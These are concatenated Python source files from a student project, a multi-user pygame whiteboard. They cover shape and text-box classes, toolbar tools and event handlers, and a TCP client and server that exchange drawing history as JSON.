toolbar_size (int) : la taille de la toolbar en pixel pour ne pas dessiner dessus
radius (int) : rayon
"""
def __init__(self, center, extremity, color, toolbar_size=0):
Figure.__init__(self)
self.center = center
# on ne veut pas depasser sur la toolbar donc on reduit le rayon
self.radius = min(int(distance(center, extremity)), center[1] - toolbar_size - 1)
self.extremity = [center[0] + self.radius, center[1]]
self.color = color
self.type = "circle"
def draw(self, screen):
"""
dessine le cercle sur l ecran
"""
pygame.draw.circle(screen, self.color, self.center, self.radius)
def fetch_params(self):
"""
Retourne un dictionnaire des parametres
"""
return {"center": self.center, "extremity": self.extremity, "color": self.color}
class TextBox(Figure):
"""
Classe d une textbox
x, y (int) : l'abscisse a gauche et l'ordonee a droite de la textbox ie (x,y) est le topleft
w (int) : longueur de la textbox
h (int) : hauteur de la textbox
box_color (list) : couleur du contour de la box
font (string) : police du texte
font_size (int) : taille des caracteres
text (string) : texte de la texbox
text_color (list) : couleur du texte
"""
def __init__(self, x, y, w, h, box_color, font, font_size, text, text_color):
Figure.__init__(self)
self.__rect = pygame.Rect(x, y, w, h)
self._color = box_color
self._text = text
self._font = font
self._font_size = font_size
self._sysfont = pygame.font.SysFont(font, font_size)
self._text_color = text_color
self._txt_surface = self._sysfont.render(text, True, self._text_color)
self.id_counter = str(x) + "_" + str(y)
self.type = "Text_box"
"""
Encapsulation
"""
def fetch_params(self):
"""
Retourne un dictionnaire des parametres
"""
return {"x": self.__rect.x, "y": self.__rect.y, "w": self.__rect.w, "h": self.__rect.h,
"box_color": self._color, "font": self._font, "font_size": self._font_size, "text": self._text,
"text_color": self._text_color}
def get_textbox_color(self):
return self._color
def set_textbox_color(self, new_color):
self._color = new_color
def get_textbox_text(self):
return self._text
def add_character_to_text(self, char, whiteboard):
"""
rajoute un caractere au texte
"""
id_counter = whiteboard.active_box.id_counter
for action in [x for x in whiteboard.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
self._text += char
action['params']["text"] = whiteboard.active_box.get_textbox_text()
action['params']["w"] = whiteboard.active_box.update()
now = datetime.now()
timestamp = datetime.timestamp(now)
action['timestamp'] = timestamp
action['client'] = whiteboard.name
action_to_update_textbox = action
for textbox in whiteboard.get_text_boxes():
if textbox.id_counter == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
whiteboard.del_text_box(textbox)
try:
whiteboard.append_text_box(TextBox(**action_to_update_textbox["params"]))
except UnboundLocalError:
print('Something unexpected happened. A textbox update may have failed')
def delete_char_from_text(self, whiteboard):
"""
efface le dernier caractere du texte
"""
id_counter = whiteboard.active_box.id_counter
for action in [x for x in whiteboard.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
self._text = self._text[:-1]
action['params']["text"] = whiteboard.active_box.get_textbox_text()
now = datetime.now()
timestamp = datetime.timestamp(now)
action['timestamp'] = timestamp
action['client'] = whiteboard.name
action_to_update_textbox = action
for textbox in whiteboard.get_text_boxes():
if textbox.id_counter == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
whiteboard.del_text_box(textbox)
try:
whiteboard.append_text_box(TextBox(**action_to_update_textbox["params"]))
except UnboundLocalError:
print('Something unexpected happened. A textbox update may have failed')
def render_font(self, text, color, antialias=True):
"""
effectue le rendu du texte
"""
return self._sysfont.render(text, antialias, color)
def set_txt_surface(self, value):
self._txt_surface = value
@property
def rect(self):
return self.__rect
def update(self):
"""
Change la taille du rectangle de contour si le texte est trop long
"""
width = max(140, self._txt_surface.get_width() + 20)
self.__rect.w = width
return width
def draw(self, screen):
"""
dessine la textbox
"""
# Blit le texte
screen.blit(self._txt_surface, (self.__rect.x + 5, self.__rect.y + 5))
# Blit le rectangle
pygame.draw.rect(screen, self._color, self.__rect, 2)
# =============================================================================
# fonction de dessins instantanees
# =============================================================================
def draw_point(params, screen):
"""
dessine un point sur l'ecran avec les parametres d entree
params (dict) : dictionnaires des parametres
screen (pygame screen) : ecran sur lequel dessiner
"""
try:
return Point(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_line(params, screen):
"""
dessine une ligne sur l'ecran avec les parametres d entree
params (dict) : dictionnaires des parametres
screen (pygame screen) : ecran sur lequel dessiner
"""
try:
return Line(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_textbox(params, screen):
"""
dessine une textbox sur l'ecran avec les parametres d entree
params (dict) : dictionnaires des parametres
screen (pygame screen) : ecran sur lequel dessiner
"""
try:
return TextBox(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_rect(params, screen):
"""
dessine un rectangle sur l'ecran avec les parametres d entree
params (dict) : dictionnaires des parametres
screen (pygame screen) : ecran sur lequel dessiner
"""
try:
return Rectangle(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_circle(params, screen):
"""
dessine un cercle sur l'ecran avec les parametres d entree
params (dict) : dictionnaires des parametres
screen (pygame screen) : ecran sur lequel dessiner
"""
try:
return Circle(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
|
Python
| 354
| 32.785309
| 116
|
/src/figures.py
| 0.577759
| 0.572659
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
import socket
import json
import sys
import math
from white_board import WhiteBoard, binary_to_dict
'''
Ouverture de la configuration initiale stockée dans config.json qui contient le mode d'écriture, la couleur et
la taille d'écriture.
Ces Paramètres sont ensuite à modifier par l'utisateur dans l'interface pygame
'''
with open('config.json') as json_file:
start_config = json.load(json_file)
'''
définition de l'adresse IP du serveur. Ici le serveur est en local.
'''
hote = start_config["ip_serveur"]
port = 5001
def main():
"""
Création d'un socket pour communiquer via un protocole TCP/IP
"""
connexion_avec_serveur = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connexion au serveur
try:
connexion_avec_serveur.connect((hote, port))
except (TimeoutError, ConnectionRefusedError, ConnectionResetError, ConnectionAbortedError) as e:
return print("Le serveur n'a pas répondu, vérifiez les paramètres de connexion")
print("Connexion réussie avec le serveur")
# First get the client id
username = binary_to_dict(connexion_avec_serveur.recv(2 ** 16))["client_id"]
# Second get the message size
msg_recu = connexion_avec_serveur.recv(2 ** 8)
message_size = binary_to_dict(msg_recu)["message_size"]
# Then get the first chunk of history using the number of byte equal to the power of 2 just above its size
msg_recu = connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1))
total_size_received = sys.getsizeof(msg_recu)
# One we get the first chunk, we loop until we get the whole history
while total_size_received < message_size:
msg_recu += connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1))
total_size_received = sys.getsizeof(msg_recu)
msg_decode = binary_to_dict(msg_recu)
hist = msg_decode
# Après réception de l'état du whiteboard, c'est à dire des figures et textboxes déjà dessinées par des utilisateurs
# précédents, le programme lance un whiteboard
whiteboard = WhiteBoard(username, start_config, hist)
whiteboard.start(connexion_avec_serveur)
if __name__ == '__main__':
main()
|
Python
| 62
| 34.112904
| 120
|
/src/client.py
| 0.707855
| 0.700505
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
from white_board import WhiteBoard
import json
'''
This file is used to run locally or to debug
'''
with open('config.json') as json_file:
start_config = json.load(json_file)
def main():
board = WhiteBoard("client", start_config)
board.start_local()
if __name__ == '__main__':
main()
|
Python
| 18
| 16
| 46
|
/src/main.py
| 0.647059
| 0.647059
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
import socket
import sys
import time
from threading import Thread
import json
'''
Les deux fonctions fonctions suivantes permettent de convertir les dictionnaires en binaire et réciproquement.
L'appel de ces dux fonctions permet d'échanger des dictionnaires par socket
'''
def dict_to_binary(dico):
try:
str = json.dumps(dico)
return bytes(str, 'utf-8')
except TypeError:
print("Le dictionnaire n'est pas du format attendu")
def binary_to_dict(binary):
try:
jsn = ''.join(binary.decode("utf-8"))
d = json.loads(jsn)
except (TypeError, json.decoder.JSONDecodeError) as e:
if e == TypeError:
print("Le message reçu n'est pas du format attendu")
else:
print("Un paquet a été perdu")
return {"actions": [], "message": [], "auth": []}
return d
class Client(Thread):
"""
Classe d'un client qui se connecte au whiteboard. Cette classe hérite de Thread de sorte que plusieurs clients
pourront utiliser le whiteboard en parallèle.
Chaque client a un nom, un booleen qui indique si le client a terminé d'utiliser le whiteboard,
ainsi qu'un historique avec toutes les opérations effectuées par lui ou les autres utilisateurs sur le whiteboard.
C'est cet historique que le client va échanger avec le serveur
"""
# Class level id for client
client_id = 1
def __init__(self, server_, client_socket=None):
Thread.__init__(self)
self._client_socket = client_socket
self._done = False
self._last_timestamp_sent = 0
self.server = server_
# Increment client id at each creation of instance
self.client_id = "Client" + str(Client.client_id)
Client.client_id += 1
"""Encapsulation"""
def __get_client_socket(self):
return self._client_socket
def __set_client_socket(self, c):
self._client_socket = c
client_socket = property(__get_client_socket, __set_client_socket)
def __get_last_timestamp_sent(self):
return self._last_timestamp_sent
def __set_last_timestamp_sent(self, c):
self._last_timestamp_sent = c
last_timestamp_sent = property(__get_last_timestamp_sent, __set_last_timestamp_sent)
def is_done(self):
return self._done
def end(self):
self._done = True
def check_match(self, action):
"""
methode permettant de vérifier si une action est déjà existante dans l'objet self._current_hist.
Elle permet notamment de savoir si une textbox vient d'être rajoutée par un autre utilisateur du whiteboard ou
si la textbox a simplement été mise à jour
"""
for textbox in [x for x in self.server.historique["actions"] if x["type"] == "Text_box"]:
if action["id"] == textbox["id"]:
textbox["timestamp"] = action["timestamp"]
textbox["params"] = action["params"]
textbox["client"] = action["client"]
return True
return False
def disconnect_client(self):
"""
methode s'executant pour mettre fin à la connexion entre le serveur et un client
"""
self.end()
print("Déconnexion d'un client")
self.server.historique["message"] = "end"
def run(self):
"""
Dans cette methode, la boucle while centrale vient en continu récupérer les dictionnaires d'historiques envoyés
par les clients.
Si le dictionnaire est différent du précédent, cela signifie qu'une mise à jour a été faite par un utilisateur.
Il convient alors de comparer le timestamp de ces mises à jour au last_timestamp qui est le dernier timestamp
où le whiboard était à jour.
Toutes les nouvelles opérations sont ensuite envoyées au client
"""
try:
while not self.is_done():
msg_recu = self.client_socket.recv(2 ** 24)
new_actions = binary_to_dict(msg_recu)
# Go through each new action and add them to history and there are two cases : if it's an action on
# an already existing text box then modify it in history, else append the action to the history
for action in new_actions["actions"]:
matched = False
if action["type"] == "Text_box":
matched = self.check_match(action)
if not matched:
self.server.historique["actions"].append(action)
if self.server.historique["message"] == "END":
# S'éxécute si le client se déconnecte
self.disconnect_client()
if new_actions["auth"] != []:
if new_actions["auth"][1]:
self.server.historique["auth"].append(new_actions["auth"][0])
else:
self.server.historique["auth"].remove(new_actions["auth"][0])
time.sleep(0.01)
actions_to_send = [x for x in self.server.historique["actions"] if
(x["timestamp"] > self.last_timestamp_sent and x["client"] != self.client_id)]
to_send = {"message": "", 'actions': actions_to_send, 'auth': self.server.historique["auth"]}
self.client_socket.send(dict_to_binary(to_send))
# Update last timestamp if there is a new action
if actions_to_send:
self.last_timestamp_sent = max([x["timestamp"] for x in actions_to_send])
except (ConnectionAbortedError, ConnectionResetError) as e:
# Gère la déconnexion soudaine d'un client
print("Un client s'est déconnecté")
class Server:
"""
Cette classe définit un serveur.
Elle a pour paramètres un port et une adresse hôte nécessaire à la création d'une connexion,
également une connexion socket propre au serveur,
ainsi qu'une liste des clients à connecter,
une liste des threads lancés qui est la liste des clients actuellement connectés
et un dictionnaire historique des opérations faites sur le serveur à échanger avec les différents clients
"""
def __init__(self, port, host='', historique=None):
self._host = host
self._port = port
self.__connexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__clients = []
self.__threadlaunched = []
if historique is None:
self.historique = {"message": "", 'actions': [], 'auth': []}
else:
self.historique = historique
'''Les méthodes et properties suivantes permettent de gérer les encapsulations'''
@property
def host(self):
return self._host
@property
def port(self):
return self._port
@property
def clients(self):
return self.__clients
def add_client(self, new_client):
self.__clients.append(new_client)
def remove_client(self, client_removed):
self.__clients.remove(client_removed)
@property
def threadlaunched(self):
return self.__threadlaunched
def add_thread(self, new_thread):
self.__threadlaunched.append(new_thread)
def remove_thread(self, thread_removed):
self.__threadlaunched.remove(thread_removed)
def scan_new_client(self):
"""Cette méthode permet de récupérer les informations du client entrant"""
# Get connexion info from server
client, infos_connexion = self.__connexion.accept()
# Initialize a new client thread
new_thread = Client(self)
# Give them an id and send it to server
client_id = new_thread.client_id
client.send(dict_to_binary({"client_id": client_id}))
to_send = dict_to_binary(self.historique)
# Get the size of history and send it because it can be too long
message_size = sys.getsizeof(to_send)
client.send(dict_to_binary({"message_size": message_size}))
# Wait a little for the previous message to not overlap with the next one
## !!WARNING!! DEPENDING ON THE COMPUTER THIS SLEEP TIME MAY BE TOO SMALL, IF THE WHITEBOARD CRASHES, PLEASE
## INCREASE IT
time.sleep(0.5)
client.send(to_send)
# Get the last timestamp sent to client
try:
new_thread.last_timestamp_sent = max([x["timestamp"] for x in self.historique["actions"]])
except ValueError:
new_thread.last_timestamp_sent = 0
new_thread.client_socket = client
self.add_client(new_thread)
print("Un client s'est connecté. Bienvenue {} !".format(client_id))
def run(self):
"""
Dans cette méthode, la boucle while permet d'écouter en permanence de nouveaux clients potentiels
et de gérer les déconnexions de clients et fermetures de thread"""
self.__connexion.bind((self.host, self.port))
# Le serveur acceptera maximum 100 clients
self.__connexion.listen(100)
print("Le serveur est prêt sur le port numéro {}".format(self.port))
while True:
self.scan_new_client()
for client in self.clients:
client.start()
self.remove_client(client)
self.add_thread(client)
for thread in self.threadlaunched:
if thread.is_done():
thread.join()
self.remove_thread(thread)
if __name__ == '__main__':
server = Server(5001, '')
server.run()
|
Python
| 252
| 37.111111
| 119
|
/src/serveur.py
| 0.609329
| 0.606518
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
"""
Module contenant les differents outils de gestion du tableau
"""
import pygame
import pygame.draw
from datetime import datetime
from figures import Point, Line, TextBox, Rectangle, Circle
import time
# =============================================================================
# classes de gestion des changements de parametres utilisateur
# =============================================================================
class TriggerBox:
"""
Classe mere abstraite qui represente une zone carree de l'ecran sur laquelle on peut cliquer
top_left (list) : coordonees du pixel en haut a gauche
size (int) : taille en pixel du cote du carre
"""
def __init__(self, top_left, size):
self.rect = pygame.Rect(top_left, size)
self.coords = top_left
def is_triggered(self, event):
"""
retourne le booleen : l'utilisateur clique sur la triggerbox
event (pygame event) : clic de souris d un utilisateur
"""
return self.rect.collidepoint(event.pos)
class Auth(TriggerBox):
"""
Classe d'un bouton qui change l'autorisation de modification
"""
def __init__(self, top_left, size):
TriggerBox.__init__(self, top_left, size)
self._size = size
def add(self, screen):
"""
Dessine la authbox
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
pygame.draw.circle(screen, [255, 0, 0],
[int(self.coords[0] + self._size[0] / 2), int(self.coords[1] + self._size[1] / 2)],
int(min(self._size[0], self._size[1] / 3)))
font = pygame.font.Font(None, 18)
legend = {"text": font.render("auth", True, [0, 0, 0]), "coords": self.coords}
screen.blit(legend["text"], legend["coords"])
def switch(self, screen, erasing_auth, modification_allowed, name):
if erasing_auth:
pygame.draw.circle(screen, [0, 255, 0],
[int(self.coords[0] + self._size[0] / 2), int(self.coords[1] + self._size[1] / 2)],
int(min(self._size[0], self._size[1] / 3)))
print("{} a donné son autorisation de modifications".format(name))
else:
pygame.draw.circle(screen, [255, 0, 0],
[int(self.coords[0] + self._size[0] / 2), int(self.coords[1] + self._size[1] / 2)],
int(min(self._size[0], self._size[1] / 3)))
print("{} a retiré son autorisation de modifications".format(name))
return [name, erasing_auth]
class Save(TriggerBox):
"""
Classe d'un bouton qui permet la sauvegarde du whiteboard en format PNG
"""
def __init__(self, top_left, size):
TriggerBox.__init__(self, top_left, size)
self._size = size
def add(self, screen):
"""
Dessine la savebox
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
font = pygame.font.Font(None, 18)
legend = {"text": font.render("save", True, [0, 0, 0]), "coords": self.coords}
screen.blit(legend["text"], legend["coords"])
def save(self, screen, whiteboard):
pygame.image.save(screen.subsurface((0, whiteboard.get_config(["toolbar_y"]) + 1,
whiteboard.get_config(["width"]),
whiteboard.get_config(["length"]) - whiteboard.get_config(
["toolbar_y"]) - 1)), "mygreatdrawing.png")
class Mode(TriggerBox):
"""
Classe d'un mode de dessin du tableau dans lequel on peut rentrer via la triggerbox dont il herite
name (string) : nom du mode qui sera inscrit dans sa triggerbox sur l'ecran
"""
def __init__(self, name, top_left, size):
super(Mode, self).__init__(top_left, size)
self.name = name
def add(self, screen):
"""
Dessine la triggerbox du mode et la rend active sur l'ecran
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
font = pygame.font.Font(None, 18)
legend = {"text": font.render(self.name, True, [0, 0, 0]), "coords": self.coords}
screen.blit(legend["text"], legend["coords"])
class ColorBox(TriggerBox):
"""
Classe d'une triggerbox de choix de couleur sur l'ecran
color (list) : color of the box
"""
def __init__(self, color, top_left, size):
super(ColorBox, self).__init__(top_left, size)
self.color = color
def add(self, screen):
"""
Dessine la colorbox
"""
pygame.draw.rect(screen, self.color, self.rect)
class FontSizeBox(TriggerBox):
"""
Classe des triggerbox de choix de l'epaisseur du trait
font_size (int) : epaisseur du trait en pixel
"""
def __init__(self, font_size, top_left, size):
super(FontSizeBox, self).__init__(top_left, size)
self.font_size = font_size
self.center = [top_left[0] + size[0] // 2,
top_left[1] + size[1] // 2] # pour dessiner un cercle representant l epaisseur de selection
def add(self, screen):
"""
Dessine la fontsizebox
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
pygame.draw.circle(screen, [0, 0, 0], self.center, self.font_size)
# =============================================================================
# classes de gestion des evenements utilisateur
# =============================================================================
class EventHandler:
"""
Classe mere des gestionnaires d'evenements utilisateur en fontcion des modes
whiteboard : classe whiteboard sur laquelle notre handler va gerer les evenements utilisateur
"""
def __init__(self, whiteboard):
self.whiteboard = whiteboard
def handle(self, event):
"""
Ce test commun a tous les modes verifie si l'utilisateur quitte ou change de mode
"""
out = False
if event.type == pygame.QUIT:
self.whiteboard.end()
self.whiteboard.switch_config("quit")
out = True
if event.type == pygame.MOUSEBUTTONDOWN:
coord = event.dict['pos']
if coord[1] <= self.whiteboard.get_config(["toolbar_y"]):
self.whiteboard.switch_config(event)
out = True
return out
class HandlePoint(EventHandler):
"""
Classe du gestionnaire d'evenement en mode point
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
def handle_all(self, event):
"""
En mode point on s'interesse aux clics gauches de souris et on dessine un point
"""
handled = self.handle(event)
# commun a tous les handler qui verifie si on change de mode ou on quitte
if handled:
return
if event.type == pygame.MOUSEBUTTONDOWN:
if event.dict["button"] != 1:
return
coord = event.dict["pos"]
to_draw = Point(coord,
self.whiteboard.get_config(["active_color"]),
self.whiteboard.get_config(["font_size"]), self.whiteboard.get_config(["toolbar_y"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
class HandleLine(EventHandler):
"""
Classe du gestionnaire d'evenement en mode ligne
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
def handle_mouse_motion(self):
"""
Gere les mouvements de souris : l'utilisateur a le clic enfonce le rendu du trait est en direct
"""
if self.whiteboard.is_drawing():
self.whiteboard.mouse_position = pygame.mouse.get_pos()
if self.whiteboard.mouse_position[1] <= self.whiteboard.get_config(["toolbar_y"]):
self.whiteboard.pen_up()
elif self.whiteboard.last_pos is not None:
to_draw = Line(self.whiteboard.get_config(["active_color"]), self.whiteboard.last_pos,
self.whiteboard.mouse_position,
self.whiteboard.get_config(["font_size"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
self.whiteboard.update_last_pos()
def handle_mouse_button_up(self):
"""
Gere la levee du doigt sur le clic : on effectue un pen up
"""
self.whiteboard.mouse_position = (0, 0)
self.whiteboard.pen_up()
self.whiteboard.reset_last_pos()
def handle_mouse_button_down(self):
"""
Gere le clic de l'utilisateur : pen down
"""
self.whiteboard.pen_down()
def handle_all(self, event):
"""
Gere tous les evenements avec la methode associe via un arbre de if
"""
handled = self.handle(event)
if handled:
return
elif event.type == pygame.MOUSEMOTION:
self.handle_mouse_motion()
elif event.type == pygame.MOUSEBUTTONUP:
self.handle_mouse_button_up()
elif event.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_button_down()
pygame.display.flip()
class HandleText(EventHandler):
"""
Classe du gestionnaire d'evenement en mode textbox
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
def box_selection(self, event):
"""
Gere les clics utilisateur
S'il s'agit d'un clic droit, on cree une nouvelle box
S'il s'agit d'un clic gauche on regarde si cela selectionne une zone d une ancienne box qui deviendra la box
active
"""
if event.dict["button"] == 3:
coord = event.dict['pos']
text_box = TextBox(*coord, self.whiteboard.get_config(["text_box", "textbox_width"]),
self.whiteboard.get_config(["text_box", "textbox_length"]),
self.whiteboard.get_config(["text_box", "active_color"]),
self.whiteboard.get_config(["text_box", "font"]),
self.whiteboard.get_config(["text_box", "font_size"]), "",
self.whiteboard.get_config(["active_color"]))
self.whiteboard.append_text_box(text_box)
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(text_box, timestamp)
self.whiteboard.set_active_box(text_box)
elif event.dict["button"] == 1:
for box in self.whiteboard.get_text_boxes():
if box.rect.collidepoint(event.pos):
self.whiteboard.set_active_box(box, new=False)
def write_in_box(self, event):
"""
Gere les entrees clavier de l'utilisateur
Si une box est selectionnee cela modifie le texte en consequence
"""
if self.whiteboard.active_box is not None:
# on efface un caractere
if event.key == pygame.K_BACKSPACE:
self.whiteboard.active_box.delete_char_from_text(self.whiteboard)
# pour modifier la box il est malheureusement necessaire de re-render tout le tableau
self.whiteboard.clear_screen()
self.whiteboard.load_actions(self.whiteboard.get_hist())
elif event.key == pygame.K_TAB or event.key == pygame.K_RETURN:
pass
else:
self.whiteboard.active_box.add_character_to_text(event.unicode, self.whiteboard)
# on re-render tout aussi ici pour éviter de superposer des écritures
self.whiteboard.clear_screen()
self.whiteboard.load_actions(self.whiteboard.get_hist())
if self.whiteboard.active_box is not None:
# Re-render the text.
self.whiteboard.active_box.set_txt_surface(self.whiteboard.active_box.render_font(
self.whiteboard.active_box.get_textbox_text(),
self.whiteboard.active_box.get_textbox_color()))
def handle_all(self, event):
"""
Gere tous les evenements avec la methode associée via un arbre de if
"""
handled = self.handle(event)
if handled:
return
if event.type == pygame.MOUSEBUTTONDOWN:
self.box_selection(event)
if event.type == pygame.KEYDOWN:
self.write_in_box(event)
pygame.display.flip()
class HandleRect(EventHandler):
"""
Classe du gestionnaire d'evenement en mode rectangle
Nous avons decidé de faire un systeme de clic drag pour tracer un rectangle
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
self.c1 = None
def handle_mouse_button_up(self, coord):
"""
Recupere la deuxieme coordonee d'un coin du rectangle a tracer quand l'utilisateur arrete de cliquer
"""
if self.c1 is not None:
coord = list(coord)
# on ne veut pas depasser sur la toolbar
coord[1] = max(self.whiteboard.get_config(["toolbar_y"]), coord[1])
to_draw = Rectangle(self.c1, coord, self.whiteboard.get_config(["active_color"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
self.c1 = None
def handle_mouse_button_down(self, event):
"""
Recupere une coordonee d'un coin du rectangle a tracer quand l'utilisateur démarre un clic
"""
if event.dict["button"] != 1:
return
self.c1 = event.dict['pos']
def handle_all(self, event):
"""
Gere tous les evenements avec la methode associe via un arbre de if
"""
handled = self.handle(event)
if handled:
return
elif event.type == pygame.MOUSEBUTTONUP:
self.handle_mouse_button_up(coord=event.dict['pos'])
elif event.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_button_down(event)
pygame.display.flip()
class HandleCircle(EventHandler):
"""
Classe du gestionnaire d'evenement en mode Cercle
Nous avons decidé de faire un systeme de clic drag la-encore pour tracer un cercle
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
self.center = None
def handle_mouse_button_up(self, coord):
"""
Recupere la coordonee d'un point sur le cercle quand l'utilisateur arrete de cliquer
"""
if self.center is not None:
coord = list(coord)
to_draw = Circle(self.center, coord, self.whiteboard.get_config(["active_color"]),
self.whiteboard.get_config(["toolbar_y"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
self.center = None
def handle_mouse_button_down(self, event):
"""
Recupere la coordonnee du centre du cercle quand l'utilisateur demarre un clic
"""
if event.dict["button"] != 1:
return
self.center = event.dict['pos']
def handle_all(self, event):
"""
Gere tous les evenements avec la methode associe via un arbre de if
"""
handled = self.handle(event)
if handled:
return
elif event.type == pygame.MOUSEBUTTONUP:
self.handle_mouse_button_up(coord=event.dict['pos'])
elif event.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_button_down(event)
pygame.display.flip()
|
Python
| 431
| 36.016243
| 116
|
/src/tools.py
| 0.564749
| 0.558418
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
import pygame
import pygame.draw
import json
import sys
from functools import reduce
import operator
from figures import TextBox, draw_line, draw_point, draw_textbox, draw_rect, draw_circle
from tools import Mode, ColorBox, Auth, Save, FontSizeBox, HandlePoint, HandleLine, HandleText, HandleRect, HandleCircle
import copy
'''
Ouverture de la configuration initiale
'''
def dict_to_binary(the_dict):
str = json.dumps(the_dict)
return bytes(str, 'utf-8')
def binary_to_dict(binary):
try:
jsn = ''.join(binary.decode("utf-8"))
d = json.loads(jsn)
except (TypeError, json.decoder.JSONDecodeError) as e:
if e == TypeError:
print("Le message reçu n'est pas du format attendu")
else:
print('Un paquet a été perdu')
return {"actions": [], "message": [], "auth": []}
return d
class WhiteBoard:
def __init__(self, client_name, start_config, start_hist=None):
"""
Whiteboard initialization : we build the GUI using the config file and the potential history of actions made by
other users. Returns a Whiteboard window ready to use.
:param client_name: Name of the client who just opened a new whiteboard window (str)
:param start_config: Whiteboard configuration stored in config.json and loaded as a dict (dict)
:param start_hist: History of actions by other users (dict)
"""
pygame.init()
if not isinstance(client_name, str):
raise TypeError("Client name must be a string")
if not isinstance(start_config, dict):
raise TypeError("Starting configuration file must be a dictionary")
if start_hist is None:
start_hist = {"actions": [], "message": [], "auth": []}
elif not isinstance(start_hist, dict):
raise TypeError("Starting history file must be a dictionary")
self._done = False
self._config = start_config
self._name = client_name
self._hist = start_hist
self.__screen = pygame.display.set_mode([self._config["width"], self._config["length"]])
self.__screen.fill(self._config["board_background_color"])
self.__handler = {"line": HandleLine(self),
"point": HandlePoint(self),
"text": HandleText(self),
"rect": HandleRect(self),
"circle": HandleCircle(self)}
pygame.draw.line(self.__screen, self._config["active_color"], [0, self._config["toolbar_y"]],
[self._config["width"], self._config["toolbar_y"]], 1)
# We create a global variable to keep track of the position of the last mode box we create in order to make
# sure that there is no overlapping between left and right boxes on the toolbar on the toolbar
"""
Tracé de la box auth, qui permet de donner l'autorisation de modification des textbox
"""
last_left_position = 0
last_right_position = self._config["width"] - self._config["mode_box_size"][0]
self._erasing_auth = False
try:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
self.__auth_box = Auth((last_left_position, 0), tuple(self._config["auth_box_size"]))
last_left_position += self._config["mode_box_size"][0]
self.__auth_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Tracé de la boite save qui permet d'enregistrer l'image
"""
try:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
self.__save_box = Save((last_left_position, 0), tuple(self._config["auth_box_size"]))
last_left_position += self._config["mode_box_size"][0]
self.__save_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
self.__modes = [Mode("point", (2 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("line", (3 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("text", (4 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("rect", (5 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("circle", (6 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"]))
]
# If right and left boxes overlap, raise an error and close pygame
try:
for mod in self.__modes:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
mod.add(self.__screen)
last_left_position += self._config["mode_box_size"][0]
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Choix des couleurs
"""
self.__colors = []
try:
for key, value in self._config["color_palette"].items():
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
color_box = ColorBox(value, (last_right_position, 0), tuple(self._config["mode_box_size"]))
last_right_position -= self._config["mode_box_size"][0]
self.__colors.append(color_box)
color_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Choix des épaisseurs
"""
self.__font_sizes = []
try:
for size in self._config["pen_sizes"]:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
font_size_box = FontSizeBox(size, (last_right_position, 0), tuple(self._config["mode_box_size"]))
last_right_position -= self._config["mode_box_size"][0]
self.__font_sizes.append(font_size_box)
font_size_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
initialisation des variables de dessin
"""
pygame.display.flip()
self._draw = False
self._last_pos = None
self._mouse_position = (0, 0)
"""
Initialisation des paramètres des text boxes
"""
self._text_boxes = [] # Cette liste contiendra les objets de type Textbox
